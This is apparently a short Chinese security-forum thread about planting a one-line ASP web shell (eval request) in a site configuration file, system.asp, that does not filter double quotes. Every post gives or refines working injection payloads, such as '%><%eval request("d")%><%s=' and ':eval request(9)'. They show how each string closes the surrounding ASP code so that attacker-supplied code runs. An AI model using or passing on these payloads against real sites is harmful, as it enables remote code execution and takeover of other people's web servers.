http://www.t00ls.net/viewthread.php?tid=13901
一句话插入配置文件system.asp没有过滤双引号,插入一句就行。常规插法如下:"%><%eval request("d")%><%但金刀客这篇文件(http://www.cqzh.cn/post/328.html)为什么说"%><%eval request("d")%><%s="必须要加s=呢?比如:web_name="中国纺织网"插入后:web_name="中国纺织网"%><%eval request("d")%><%"跟这样不就全闭合了吗?还需要<%s="干嘛?直接<%闭合下面的不就行了。
=========
":eval request(9) //这多简单
=================
<%webname="abc"webhost="d:/abc/abc/www"%>插入"%><%eval request("d")%><%s="后就变成<%webname="abc"%><%eval request("d")%><%s=""webhost="d:/abc/abc/www"%>